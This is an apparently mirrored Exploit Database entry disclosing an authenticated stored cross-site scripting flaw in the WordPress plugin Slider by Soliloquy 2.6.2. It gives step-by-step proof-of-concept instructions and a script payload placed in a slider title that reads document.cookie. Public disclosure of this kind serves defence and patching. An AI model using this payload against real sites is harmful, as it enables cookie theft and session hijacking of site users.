WordPress Plugin Slider by Soliloquy 2.6.2 – ‘title’ Stored Cross Site Scripting (XSS) (Authenticated)

• Exploit Database
• 50 阅读

• 作者： Abdurrahman Erkan
  日期： 2021-12-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50563/

• # Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)
  # Date: 02/12/2021
  # Exploit Author: Abdurrahman Erkan (@erknabd)
  # Vendor Homepage: https://soliloquywp.com/
  # Software Link: https://wordpress.org/plugins/soliloquy-lite/
  # Version: 2.6.2
  # Tested on: Kali Linux 2021 - Firefox 78.7, Windows 10 - Brave 1.32.113, WordPress 5.8.2
  
  # Proof of Concept:
  #
  # 1- Install and activate the Slider by Soliloquy 2.6.2 plugin.
  # 2- Open Soliloquy and use "Add New" button to add new post.
  # 3- Add payload to title. Payload: <script>alert(document.cookie)</script>
  # 4- Add any image in post.
  # 5- Publish the post.
  # 6- XSS has been triggered.
  #
  # Go to this url "http://localhost/wp-admin/post.php?post=1&action=edit" XSS will trigger. - For wordpress users.
  # Go to this url "http://localhost/?post_type=soliloquy&p=1" XSS will trigger. - For normal users.